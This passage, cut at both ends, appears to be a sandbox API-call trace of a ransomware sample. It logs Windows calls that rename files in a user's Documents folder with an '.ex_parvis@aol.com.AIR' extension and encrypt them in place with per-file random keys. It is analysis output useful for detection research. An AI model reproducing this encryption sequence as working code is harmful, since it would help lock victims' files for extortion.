hFile=0x394, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x167b5, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x167b5, lpOverlapped=0x0) returned 1 [0160.988] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.988] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.988] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx", dwFileAttributes=0x80) returned 1 [0160.988] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx") returned 58 [0160.988] GetProcessHeap () returned 0x2e0000 [0160.988] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x319d30 [0160.988] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx" [0160.988] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx.12781717671972518758.ex_parvis@aol.com.AIR" [0160.988] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\joj1nkzjzbma.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\joj1nkzjzbma.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.991] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Joj1nKzjZBmA.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\joj1nkzjzbma.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.991] GetProcessHeap () returned 0x2e0000 [0160.991] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.991] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=8812) returned 1 [0160.991] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x226c [0160.991] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.991] GetProcessHeap () returned 0x2e0000 [0160.991] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.991] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.991] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.992] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.992] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.993] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x226c) returned 0x3ac410 [0160.993] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x226c) returned 0x3ae688 [0160.993] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.993] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x226c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x226c, lpOverlapped=0x0) returned 1 [0160.993] SetFilePointer (in: hFile=0x394, lDistanceToMove=-8812, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.993] WriteFile (in: hFile=0x394, lpBuffer=0x3ae688*, nNumberOfBytesToWrite=0x226c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ae688*, lpNumberOfBytesWritten=0x2acf9c8*=0x226c, lpOverlapped=0x0) returned 1 [0160.994] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.994] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.994] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx", dwFileAttributes=0x80) returned 1 [0160.994] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx") returned 59 [0160.994] GetProcessHeap () returned 0x2e0000 [0160.994] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xdc) returned 0x319d30 [0160.994] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx" [0160.994] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" [0160.994] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i6b3hi3ief5-t.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i6b3hi3ief5-t.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.996] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\I6b3hI3IEf5-t.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i6b3hi3ief5-t.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.996] GetProcessHeap () returned 0x2e0000 [0160.996] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.996] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=18847) returned 1 [0160.996] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x499f [0160.996] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.996] GetProcessHeap () returned 0x2e0000 [0160.996] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.996] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.997] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.998] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.998] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.998] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x499f) returned 0x3ac410 [0160.998] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x499f) returned 0x3b0db8 [0160.998] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.998] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x499f, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x499f, lpOverlapped=0x0) returned 1 [0161.000] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.000] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.000] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx", dwFileAttributes=0x80) returned 1 [0161.000] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx") returned 52 [0161.000] GetProcessHeap () returned 0x2e0000 [0161.000] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xce) returned 0x3470a0 [0161.000] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx" [0161.000] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx.12781717671972518758.ex_parvis@aol.com.AIR" [0161.000] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hwbjit.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hwbjit.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.003] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HWBJIt.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hwbjit.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0161.003] GetProcessHeap () returned 0x2e0000 [0161.003] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.003] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=14612) returned 1 [0161.003] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x3914 [0161.003] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.003] GetProcessHeap () returned 0x2e0000 [0161.003] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.003] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.003] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.004] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.004] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.005] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x3914) returned 0x3ac410 [0161.005] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x3914) returned 0x3afd30 [0161.005] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.005] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x3914, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x3914, lpOverlapped=0x0) returned 1 [0161.005] SetFilePointer (in: hFile=0x394, lDistanceToMove=-14612, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.005] WriteFile (in: hFile=0x394, lpBuffer=0x3afd30*, nNumberOfBytesToWrite=0x3914, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3afd30*, lpNumberOfBytesWritten=0x2acf9c8*=0x3914, lpOverlapped=0x0) returned 1 [0161.005] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.005] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.005] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx", dwFileAttributes=0x80) returned 1 [0161.006] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx") returned 66 [0161.006] GetProcessHeap () returned 0x2e0000 [0161.006] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xea) returned 0x31fae0 [0161.006] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx" [0161.006] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx.12781717671972518758.ex_parvis@aol.com.AIR" [0161.006] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fh77nqqwt8vt6ylfs6rb.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fh77nqqwt8vt6ylfs6rb.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.008] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fh77NqQwT8vt6YlFs6Rb.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fh77nqqwt8vt6ylfs6rb.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0161.008] GetProcessHeap () returned 0x2e0000 [0161.008] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0161.008] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=66857) returned 1 [0161.008] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10529 [0161.008] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.008] GetProcessHeap () returned 0x2e0000 [0161.008] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.008] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.009] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.009] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.009] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.009] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10529) returned 0x3ac410 [0161.010] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x10529, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x10529, lpOverlapped=0x0) returned 1 [0161.012] SetFilePointer (in: hFile=0x394, lDistanceToMove=-66857, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.012] WriteFile (in: hFile=0x394, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x10529, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x10529, lpOverlapped=0x0) returned 1 [0161.012] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.012] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.012] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.012] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 52 [0161.012] GetProcessHeap () returned 0x2e0000 [0161.012] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xce) returned 0x3470a0 [0161.012] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" [0161.013] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.013] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.015] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0161.015] GetProcessHeap () returned 0x2e0000 [0161.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.015] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=402) returned 1 [0161.015] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x192 [0161.016] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.016] GetProcessHeap () returned 0x2e0000 [0161.016] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.016] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.016] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.017] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.017] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.017] ReadFile (in: hFile=0x394, lpBuffer=0x319788, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesRead=0x2acf9c8*=0x192, lpOverlapped=0x0) returned 1 [0161.017] SetFilePointer (in: hFile=0x394, lDistanceToMove=-402, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.017] WriteFile (in: hFile=0x394, lpBuffer=0x3aa428*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa428*, lpNumberOfBytesWritten=0x2acf9c8*=0x192, lpOverlapped=0x0) returned 1 [0161.017] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.017] CryptGenRandom (in: hProv=0x3289b8, 